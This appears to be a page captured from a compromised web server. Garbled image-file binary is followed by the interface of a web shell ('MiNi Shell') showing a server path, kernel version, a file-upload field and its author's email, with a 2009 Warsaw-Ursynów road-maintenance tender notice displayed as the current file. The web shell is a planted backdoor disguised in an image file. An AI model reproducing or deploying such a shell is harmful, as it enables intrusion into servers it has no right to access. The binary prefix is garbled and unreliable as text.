JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090423/117560-N-2009.html

<p class="kh_header"><b>Warszawa: Utrzymanie, remont, konserwacja i naprawa wraz z oznakowaniem i modernizacją oświetlenia, dróg gminnych oraz dróg będących we władaniu m.st. Warszawy znajdujących się na terenie Dzielnicy Ursynów</b><br>
<b>Numer ogłoszenia: 117560 - 2009; data zamieszczenia: 23.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Ursynów , al. Komisji Edukacji Narodowej 61, 02-777 Warszawa, woj. mazowieckie, tel. 022 5457100, faks 022 5457291.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ursynow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie, remont, konserwacja i naprawa wraz z oznakowaniem i modernizacją oświetlenia, dróg gminnych oraz dróg będących we władaniu m.st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie, remont, konserwacja i naprawa wraz   z oznakowaniem i modernizacją oświetlenia, dróg gminnych oraz dróg będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.
I. Zakres prac objętych zamówieniem obejmuje: 
1.  Usuwanie awarii - likwidacja uszkodzeń oznakowania drogowego i nawierzchni drogowych zagrażających bezpieczeństwu ruchu kołowego lub pieszego.
2. Konserwację - naprawy bieżące nawierzchni jezdni i chodników bez zmiany konstrukcji nawierzchni.
3. Remonty - wykonywanie robót przywracających pierwotny stan drogi, także przy użyciu wyrobów budowlanych innych niż użyte pierwotnie. 
II. Zakres rzeczowy robót objętych przedmiotem zamówienia
1. Konserwacja i remonty cząstkowe ulic na terenie Dzielnicy Ursynów na całej szerokości pasa drogowego, a w szczególności wykonywanie robót w następujących zakresach:
1.1.  Roboty ziemne
- roboty ziemne ręczne z odwiezieniem urobku
- roboty ziemne mechaniczne z odwiezieniem urobku 
1.2.  Warstwy odsączające i podsypkowe i podbudowy
- warstwy podsypkowe cementowo - piaskowe i piaskowe
- warstwy odsączające
- podbudowa z tłucznia kamiennego sortowanego
1.3.  Nawierzchnie dróg nieulepszone
- nawierzchnie gruntowe
- nawierzchnie żwirowe i z kruszywa kamiennego
1.4.  Nawierzchnie ulepszone
- nawierzchnie z  asfaltu lanego, nawierzchnie z kostki brukowej i trylinki
1.5.  Krawężniki i obrzeża
- krawężniki  betonowe    15x30x100 cm  na  podsypce   cementowo - piaskowej  na  ławach
  z oporem 
- krawężniki betonowe 20x30x100 cm na podsypce cementowo - piaskowej na ławach z oporem
- obrzeża betonowe 30x8 cm na podsypce piaskowej
- ławy betonowe pod krawężniki 
1.6. Chodniki
- chodniki z kostki brukowej  betonowej  szarej  o  gr. 6 cm  i  8 cm  na podsypce  piaskowej  
  i cementowo-piaskowej
- chodniki z płyt betonowych 50x50x7 cm na podsypce piaskowej 
- chodniki z asfaltu lanego
1.7.  Roboty rozbiórkowe
- rozebranie nawierzchni z mas mineralno - bitumicznych z odwiezieniem gruzu
- rozebranie chodników z płyt betonowych z odwiezieniem gruzu, rozebranie nawierzchni             
   z kostki
- rozebranie krawężników betonowych z odwiezieniem gruzu
- rozebranie obrzeży trawnikowych z odwiezieniem gruzu 
1.8. Remonty cząstkowe jezdni o nawierzchniach bitumicznych z odwiezieniem gruzu
- remonty cząstkowe z mieszanek mineralno - bitumicznych
- remonty cząstkowe nawierzchni z  asfaltu lanego
- remonty cząstkowe nawierzchni bitumicznych masą z recyklera
1.9.  Roboty naprawczo - konserwacyjne
- naprawy dróg gruntowych - profilowanie, zagęszczenie 
1.10. Oznakowanie pionowe i poziome
- odnawianie oznakowania poziomego jezdni farbą chlorokauczukową i chemoutwardzalną             
   z  dodatkami mikrokulek szklanych
- wymiana oznakowań zniszczonych ( znaki drogowe, słupki do znaków drogowych, słupki 
   wygrodzeniowe, łańcuchy, pylony)
- prostowanie sztyc do znaków drogowych i słupków wygrodzeniowych
- wygrodzenie elementami małej architektury donicami prostokątnymi 60x40x40, 100x40x40 lub donicami kwadratowowymi 50x50x50
1.11. Urządzenia odwodnieniowe
- utrzymanie drożności istniejących studni chłonnych.
- regulacja  pionowa a zaworów wodociągowych, gazowych, włazów kanałowych, kratek   
  ściekowych ulicznych oraz studni teletechnicznych.
1.12. Modernizacja, przebudowa oświetlenia ulicznego nastąpi na podstawie projektu lub ustaleń przeprowadzonych w dniu wprowadzenia na budowę
1.13. Opracowanie dokumentacji projektowych na: przebudowę, remont, konserwację dróg oraz modernizację oświetlenia ulicznego nastąpi na podstawie ustaleń przeprowadzonych                w protokóle wprowadzenia.

Szczegółowy opis przedmiotu zamówienia stanowią:
- opis przedmiotu zamówienia- załącznik nr 1A do SIWZ,
- dokumentacja projektowa składająca się z:
- specyfikacji technicznej wykonania i odbioru robót budowlanych - załącznik nr 1B do SIWZ,
- przedmiaru robót - załącznik nr 1C do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.50-5, 45.31.61.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 50 000 zł (pięćdziesiąt tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wykonawca spełnia warunki określone w art. 22 ust.1 pkt 1-3 ustawy Pzp oraz w art. 22 ust. 1 pkt 4 ustawy Pzp, tj.:
1.1. 
Wykaże, że w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał (tj. zakończył) co najmniej dwie roboty budowlane o minimalnej wartości 4 500 000 zł brutto każda - obejmująca swoim zakresem wykonanie: 
- budowy lub przebudowy dróg wraz z oznakowaniem i budową lub modernizacją oświetlenia dróg. 
albo 
- utrzymania lub remontu, konserwacji, naprawy wraz z oznakowaniem i budową lub modernizacją oświetlenia dróg. 
1.2. 
Wykonawca musi dysponować osobami zdolnymi do wykonywania zamówienia, legitymującymi się odpowiednimi kwalifikacjami zawodowymi, doświadczeniem 
i wykształceniem, tj. co najmniej jedną osobą posiadającą uprawnienia budowlane i potwierdzoną przynależność do właściwej Izby Samorządu Zawodowego Inżynierów Budownictwa w rozumieniu ustawy z dnia 15 grudnia 2000r. o Samorządach Zawodowych Architektów, Inżynierów Budownictwa oraz Urbanistów (Dz. U. z 2001 r. Nr 5, poz. 42 z późn. zm.), w każdej z poniżej wyszczególnionych specjalności: 
1)	drogowej
2)	instalacyjnej w zakresie sieci elektrycznych.
LUB
w przypadku gdy Wykonawca nie dysponuje samodzielnie powyżej wskazanymi osobami zdolnymi do wykonania zamówienia, a będzie polegać na zdolnościach w tym zakresie innych podmiotów - w celu udowodnienia Zamawiającemu, iż będzie dysponował tymi osobami przedstawi pisemne zobowiązanie tych podmiotów do udostępnienia niniejszych osób.
1.3. 
Wykonawca posiada aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności odpowiadającej przedmiotowi zamówienia.

Ocena spełniania warunków udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w pkt 2. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił.

Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty o których mowa w art. 25 ust. 1 zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa do ich złożenia w wyznaczonym terminie, chyba, że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne będzie unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu, nie później niż w dniu, w którym upłynął termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 2. W celu potwierdzenia spełnienia warunków udziału w postępowaniu, Wykonawca zobligowany jest do dostarczenia niżej wymienionych dokumentów:
2.1. Oświadczenia, że Wykonawca spełnia warunki określone w art. 22 ust. 1 pkt 1-4 ustawy Pzp - potwierdzającego spełnienie warunku określonego w pkt 1. Ogłoszenia. Niniejsze oświadczenie winno być sporządzone zgodnie z treścią załącznika nr 3 do SIWZ lub 
w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia 3A do SIWZ. Zabronione jest wprowadzanie jakichkolwiek zmian w treści załącznika.
2.2. Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - potwierdzającego spełnienie warunku określonego w pkt 1. Ogłoszenia.
2.3. Aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - potwierdzających spełnienie warunku określonego w pkt 1 Ogłoszenia.
2.4. Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - potwierdzającej spełnienie warunku określonego w pkt 1. Ogłoszenia.
2.5. Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert  (dotycząca podmiotów zbiorowych) - potwierdzającej spełnienie warunku określonego w pkt 1. Ogłoszenia.
2.6. Wykazu wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (np. referencje) - potwierdzającego spełnienie warunku określonego w pkt 1.oraz 1.1. Ogłoszenia. Niniejszy wykaz winien być zgodnym z treścią załącznika nr 4 do SIWZ. Zabronione jest wprowadzanie jakichkolwiek zmian w treści załącznika.
2.7. Wykazu osób, którymi dysponuje, lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - potwierdzającego spełnienie warunku określonego w pkt 1 oraz 1.2. Ogłoszenia. Niniejszy wykaz winien być zgodnym z treścią załącznika nr 5 do SIWZ. Zabronione jest wprowadzanie jakichkolwiek zmian w treści załącznika.
2.7. a) Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 2.7.Ogłoszenia, Wykonawca wskazał osoby, którymi będzie dysponował.
2.8. Dokumentów stwierdzających, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia - potwierdzających spełnienie warunku określonego w pkt 1 oraz 1.2. Ogłoszenia.
2.9. Polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności - potwierdzającego spełnienie warunku określonego w pkt. 1 oraz 1.3. Ogłoszenia.
3. Wykonawcy zagraniczni składają dokumenty wymienione w punktach 2.2. i 2.5. Ogłoszenia zgodnie z wymogami określonymi w tych punktach, bądź też tożsame odpowiedniki wymaganych dokumentów stosowane w kraju właściwym dla Wykonawcy potwierdzające, że nie otwarto ich likwidacji ani nie ogłoszono upadłości, a także nie orzeczono wobec niego zakazu ubiegania się o zamówienie. Odnośnie punktu 2.4., Wykonawca składa zaświadczenie właściwego organu sadowego lub administracyjnego kraju pochodzenia albo zamieszkania, którego dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - Prawo zamówień publicznych. Wyszczególnione powyżej dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
W odniesieniu do dokumentów wyszczególnionych w punkcie 2.3. Wykonawca przedstawi dokument, iż nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenia społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Dokumenty sporządzone w języku obcym są składane wraz z  tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa powyżej - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
4.1. Oświadczenie wymienione w pkt 2.1. Ogłoszenia w zakresie: art. 22 ust. 1 pkt 1-4 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wspólnie - przy czym w zakresie art. 22 ust.1 pkt 4 każdy z Wykonawców potwierdza z osobna, iż nie podlega wykluczeniu z postępowania o udzielenie zamówienia, natomiast w zakresie art. 22 ust. 1 pkt 1-3 ustawy Pzp Wykonawcy potwierdzają wspólnie (tj. przez umocowanego Pełnomocnika), iż określone przez Zamawiającego warunki spełniają razem.
4.2. Dokument wymieniony w pkt 2.2., 2.3, 2.4, 2.5 Ogłoszenia winien przedłożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia z osobna, tak aby samodzielnie potwierdzić spełnianie warunku, którego dotyczy.
4.3. Dokument wymieniony w pkt  2.9. Ogłoszenia winien przedłożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia z osobna, tak aby potwierdzić łącznie spełnianie warunku, którego dotyczy.
4.4. Dokumenty wymienione w pkt  2.6., 2.7, 2.8 Ogłoszenia oraz 2.7 a) Ogłoszenia - jeżeli dotyczy, winien przedłożyć jeden albo więcej Wykonawców wspólnie ubiegających się o udzielenie zamówienia, tak aby potwierdzić łącznie spełnianie warunku, którego dotyczy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ursynow.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> - osobiście w Urzędzie m. st. Warszawy Dzielnicy Ursynów, 02-777 Warszawa, Al. KEN 61 pok. nr 416 lub otrzymać za zaliczeniem pocztowym, w tym wypadku koszty przesyłki ponosi Wykonawca.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2009 godzina 10:00, miejsce: SIEDZIBA ZAMAWIAJACEGO PRZY AL. KEN 61, POK. NR 407.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Termin i  miejsce otwarcia ofert: 
Data:  14/05/2009   Godzina: 10:30
Miejsce: SIEDZIBA ZAMAWIAJACEGO PRZY AL. KEN 61, POK. NR 421
2. Wykonawca nie może zlecić Podwykonawcom wszystkich rodzajów robót objętych niniejszym zamówieniem. Zamawiający żąda od Wykonawcy wskazania w ofercie części zamówienia, którą zamierza powierzyć Podwykonawcom.
3.Zamawiający nie zamierza w ramach niniejszego postępowania zawrzeć umowy ramowej.
4.Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów.
5.Osobami uprawnionymi do kontaktu z Wykonawcami są:
- w zakresie dotyczącym przedmiotu zamówienia:
Maria Piekarska - inspektor
tel. 022/545-72-22  fax 022/ 545-72-20	
- w zakresie dotyczącym zagadnień formalno-prawnych:
Aneta Piotrowska - podinspektor

Creat By MiNi SheLL
Email: jattceo@gmail.com